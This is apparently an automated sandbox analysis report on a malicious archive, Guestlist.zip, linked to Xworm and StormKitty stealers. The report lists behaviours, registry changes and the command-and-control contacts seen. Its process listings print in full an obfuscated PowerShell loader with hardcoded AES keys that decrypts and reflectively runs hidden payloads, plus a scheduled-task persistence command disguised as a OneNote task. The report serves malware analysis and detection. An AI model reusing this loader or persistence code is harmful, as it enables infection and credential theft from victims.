Analysis Overview
SHA256
09ebaac81c2816aae61095e019924152b15c1504b0f2f6b512c4230b72268bf8
Threat Level: Known bad
The file Guestlist.zip was found to be: Known bad.
Malicious Activity Summary
StormKitty payload
Gurcu, WhiteSnake
Detect Xworm Payload
Xworm
XenArmor Suite
StormKitty
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Reads local data of messenger clients
Executes dropped EXE
Reads WinSCP keys stored on the system
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
UPX packed file
Checks computer location settings
Reads data files stored by FTP clients
ACProtect 1.3x - 1.4x DLL software
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-07-03 20:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-03 20:01
Reported
2024-07-03 20:04
Platform
win7-20240508-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1684 wrote to memory of 1244 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1684 wrote to memory of 1244 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1684 wrote to memory of 1244 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1684 wrote to memory of 1316 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1684 wrote to memory of 1316 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1684 wrote to memory of 1316 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\wild2.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('7wFkEAMgT15IlR12QYdvYeiKFxGbAYX0oQI0LpFbKWU='); $aes_var.IV=[System.Convert]::FromBase64String('bGaT/qQXAZ1jwzjNeDyQCg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FNnBE=New-Object System.IO.MemoryStream(,$param_var); $AJjqG=New-Object System.IO.MemoryStream; $fbver=New-Object System.IO.Compression.GZipStream($FNnBE, [IO.Compression.CompressionMode]::Decompress); $fbver.CopyTo($AJjqG); $fbver.Dispose(); $FNnBE.Dispose(); $AJjqG.Dispose(); $AJjqG.ToArray();}function execute_function($param_var,$param2_var){ $QipFS=[System.Reflection.Assembly]::Load([byte[]]$param_var); $PhiBy=$QipFS.EntryPoint; $PhiBy.Invoke($null, $param2_var);}$VfwJS = 'C:\Users\Admin\AppData\Local\Temp\wild2.bat';$host.UI.RawUI.WindowTitle = $VfwJS;$CtScz=[System.IO.File]::ReadAllText($VfwJS).Split([Environment]::NewLine);foreach ($jbVyw in $CtScz) { if ($jbVyw.StartsWith('lxeWUjbreKgbBVHbyYLg')) { $SrUtu=$jbVyw.Substring(20); break; }}$payloads_var=[string[]]$SrUtu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Network
Files
memory/1316-4-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp
memory/1316-6-0x0000000002810000-0x0000000002818000-memory.dmp
memory/1316-5-0x000000001B540000-0x000000001B822000-memory.dmp
memory/1316-7-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
memory/1316-8-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
memory/1316-9-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
memory/1316-10-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
memory/1316-11-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
memory/1316-12-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-03 20:01
Reported
2024-07-03 20:04
Platform
win10v2004-20240508-en
Max time kernel
137s
Max time network
146s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\wild2.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('7wFkEAMgT15IlR12QYdvYeiKFxGbAYX0oQI0LpFbKWU='); $aes_var.IV=[System.Convert]::FromBase64String('bGaT/qQXAZ1jwzjNeDyQCg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FNnBE=New-Object System.IO.MemoryStream(,$param_var); $AJjqG=New-Object System.IO.MemoryStream; $fbver=New-Object System.IO.Compression.GZipStream($FNnBE, [IO.Compression.CompressionMode]::Decompress); $fbver.CopyTo($AJjqG); $fbver.Dispose(); $FNnBE.Dispose(); $AJjqG.Dispose(); $AJjqG.ToArray();}function execute_function($param_var,$param2_var){ $QipFS=[System.Reflection.Assembly]::Load([byte[]]$param_var); $PhiBy=$QipFS.EntryPoint; $PhiBy.Invoke($null, $param2_var);}$VfwJS = 'C:\Users\Admin\AppData\Local\Temp\wild2.bat';$host.UI.RawUI.WindowTitle = $VfwJS;$CtScz=[System.IO.File]::ReadAllText($VfwJS).Split([Environment]::NewLine);foreach ($jbVyw in $CtScz) { if ($jbVyw.StartsWith('lxeWUjbreKgbBVHbyYLg')) { $SrUtu=$jbVyw.Substring(20); break; }}$payloads_var=[string[]]$SrUtu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\wild2')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| US | 142.202.242.177:7000 | tcp | |
| US | 142.202.242.177:7000 | tcp | |
| US | 142.202.242.177:7000 | tcp | |
| US | 142.202.242.177:7000 | tcp | |
| US | 142.202.242.177:7000 | tcp |
Files
memory/4144-0-0x00007FFC3E9F3000-0x00007FFC3E9F5000-memory.dmp
memory/4144-6-0x0000027205A80000-0x0000027205AA2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z3ynkswj.5wa.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4144-11-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp
memory/4144-12-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp
memory/4144-13-0x000002721EDF0000-0x000002721EE34000-memory.dmp
memory/4144-14-0x000002721EEC0000-0x000002721EF36000-memory.dmp
memory/2400-24-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp
memory/2400-25-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp
memory/2400-26-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp
memory/2400-29-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp
memory/4144-30-0x0000027205AB0000-0x0000027205AB8000-memory.dmp
memory/4144-31-0x000002721E070000-0x000002721E080000-memory.dmp
memory/4144-34-0x000002721E080000-0x000002721E094000-memory.dmp
memory/4144-33-0x00007FFC5B9F0000-0x00007FFC5BAAE000-memory.dmp
memory/4144-32-0x00007FFC5CA70000-0x00007FFC5CC65000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | baebece6c25520221e68055be287f370 |
| SHA1 | a3e7232cd44a9c9980da327dcd5124a0889a5486 |
| SHA256 | 4e97fe0cb5b7c529ae80d3678e9f31fc25c09f0b450f9231d8a472be0d35de07 |
| SHA512 | fb57454e55b0a17254f898f52e5106fd82bcf2046c310ed207fa9f2d44526f66ad49335c105947a21c57681f4365707c63809a566f60bad47f745891cb7e9c5d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9d662ecae338ca923a784422a86e9925 |
| SHA1 | ccdbbd6f3a1801b13f503d92f5d48fe5041ab495 |
| SHA256 | af4b4d21aa532d4ca4638e2d3c9a07760dfeb65fbe782319860130ba09b62d6e |
| SHA512 | 5455380e241bd3f697a8697cac7bcce54a1dc323d33995067407bc92858bc2d2216f092cce674a87f3b2d9f34b61bb5b7b13c1b57d511f1540123d38cc7bf38e |
memory/4144-58-0x000002721F2A0000-0x000002721F2B6000-memory.dmp
memory/4144-60-0x00007FFC3E9F3000-0x00007FFC3E9F5000-memory.dmp
memory/4144-61-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-03 20:01
Reported
2024-07-03 20:04
Platform
win7-20240508-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1936 wrote to memory of 2028 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
| PID 1936 wrote to memory of 2028 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
| PID 1936 wrote to memory of 2028 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe |
| PID 2028 wrote to memory of 2456 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2028 wrote to memory of 2456 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2028 wrote to memory of 2456 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2028 wrote to memory of 2468 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2028 wrote to memory of 2468 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2028 wrote to memory of 2468 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wild2.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\dropped.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('ugGNW2NnPvk9adSUBcDc96/inp4cdhLsP4c8Xr7rMvA='); $aes_var.IV=[System.Convert]::FromBase64String('GuK3QAh6wjXaE/OXIlyZUw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ikyRS=New-Object System.IO.MemoryStream(,$param_var); $tIvxd=New-Object System.IO.MemoryStream; $uIXwv=New-Object System.IO.Compression.GZipStream($ikyRS, [IO.Compression.CompressionMode]::Decompress); $uIXwv.CopyTo($tIvxd); $uIXwv.Dispose(); $ikyRS.Dispose(); $tIvxd.Dispose(); $tIvxd.ToArray();}function execute_function($param_var,$param2_var){ $kiXtP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $zdYbv=$kiXtP.EntryPoint; $zdYbv.Invoke($null, $param2_var);}$dTbxL = 'C:\Users\Admin\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $dTbxL;$cGnsR=[System.IO.File]::ReadAllText($dTbxL).Split([Environment]::NewLine);foreach ($QrlnJ in $cGnsR) { if ($QrlnJ.StartsWith('oJuhxRvpkzgxXdlXhMuO')) { $JHuZc=$QrlnJ.Substring(20); break; }}$payloads_var=[string[]]$JHuZc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Network
Files
C:\Users\Admin\AppData\Roaming\dropped.bat
| MD5 | e770f53921bca6b9d02faf3e70059249 |
| SHA1 | fb04530ec135f2a34afd3bdf0c205193418812b6 |
| SHA256 | be7e5d1cccf5602cbe866ce6f342bd960263f3cd08a75d149372af37fa2a50b1 |
| SHA512 | f970fab83358451a7cb158d4377defa35188996b1f2005a90e1fe0e747db65424366efcc847c133919395310536348bc795caef3161a21b70b2b0cd16566ec86 |
memory/2468-6-0x0000000002D30000-0x0000000002DB0000-memory.dmp
memory/2468-7-0x000000001B480000-0x000000001B762000-memory.dmp
memory/2468-8-0x0000000002410000-0x0000000002418000-memory.dmp
memory/2468-9-0x0000000002D30000-0x0000000002DB0000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-03 20:01
Reported
2024-07-03 20:04
Platform
win10v2004-20240611-en
Max time kernel
136s
Max time network
145s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gurcu, WhiteSnake
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XenArmor Suite
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\All-In-One.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\All-In-One.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads local data of messenger clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Local\Temp\All-In-One.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4612 set thread context of 1188 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\All-In-One.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\All-In-One.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\All-In-One.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\All-In-One.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
